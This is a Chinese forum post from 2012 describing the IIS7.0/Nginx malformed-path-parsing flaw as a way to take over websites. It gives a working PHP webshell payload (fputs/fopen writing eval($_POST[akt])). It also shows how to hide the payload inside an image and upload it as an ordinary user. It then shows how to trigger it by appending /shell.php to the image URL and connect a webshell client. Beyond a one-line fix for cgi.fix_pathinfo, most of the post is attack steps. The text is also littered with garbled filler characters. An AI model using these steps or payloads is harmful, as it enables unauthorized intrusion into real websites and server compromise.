IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0 2 N, I( Y( A& \0 ?/ h
Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。
8 X4 ~" ~) R( D+ T7 U) ?' y7 g__________________________________
% y r: V; m; e5 b6 k& t1 G0 b+ ?! n: G2 C
先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载)
; b& t: E4 l# d# d先合并一张PHP一句话图片马,合并方法: . Q/ k& x7 y' \1 F1 c
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
5 T4 G' A/ g* [* a5 c: g+ E②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>"
" D! ?. [" s n* O3 f! o. x" U/ ?# t图片随便找一张. 0 s/ P0 w( c* ?3 }3 b5 X; }" j
一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?> 0 W& r$ s& ]) k' C6 K
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。 - R0 h0 a$ g+ E( n, G5 c+ U
找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。 5 G: d# D) d" \+ L
比如假设图片地址为 http://www.political-security.com/tupian/1.jpg& u$ @: _5 e3 {3 y# k9 F0 w* N
则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php
/ [0 C; E. e1 N4 @7 Y然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php 8 Z2 h/ ^) }- A; v- m L5 N1 [
shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。
: c& D% ~( l$ ^3 ?上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。 + ~( ]5 E, V& `, J9 v
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
, i h0 I: M$ n/ T3 {% M6 q在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。
- s& G6 I5 [3 n8 p6 g& ?剩下的就随便你去搞吧。
' u! z; z: B" [5 k3 q2 b% ~* |4 }: ^4 R* {- i9 h/ @+ U6 r( f& H
|
发表于 2012-9-27 19:40:10
收藏
支持
反对